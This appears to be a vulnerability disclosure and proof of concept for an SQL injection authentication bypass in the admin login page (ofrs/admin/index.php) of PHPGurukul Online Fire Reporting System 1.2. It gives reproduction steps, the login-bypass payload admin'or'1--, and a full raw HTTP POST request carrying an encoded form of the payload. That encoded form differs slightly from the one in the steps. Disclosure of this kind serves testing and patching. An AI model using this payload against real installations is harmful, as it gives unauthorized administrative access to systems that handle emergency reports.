A SQL Injection vulnerability exists in the ofrs/admin/index.php
script of PHPGurukul Online Fire Reporting System 1.2. The
vulnerability allows attackers to bypass authentication and gain
unauthorized access by injecting SQL commands into the username input
field during the login process.
- Vendor Homepage: https://phpgurukul.com/online-fire-reporting-system-using-php-and-mysql/
- Software Link: https://phpgurukul.com/projects/Online-Fire-Reporting-System-using-PHP.zip
- Version: V1.2
- Tested on: Windows 11 + XAMPP 8.0.30
SQL Injection Vulnerability in ofrs/admin/index.php : The SQL injection vulnerability in the ofrs/admin/index.php script arises from the insecure handling of user input during the login process.
- Open the admin panel page by following URL: http://localhost/ofrs/admin/index.php
- Enter the following payload from username-box:
admin'or'1--
- Press the
Login
button or press Enter.
POST /ofrs/admin/index.php HTTP/1.1
Host: localhost
Content-Length: 46
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/ofrs/admin/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=fmnj70mh1qo2ssv80mlsv50o29
Connection: close
username=admin%27or%27--&inputpwd=&login=login
SQL Injection
online_fire_reporting_system_project
online_fire_reporting_system - v1.2
ofrs/admin/index.php script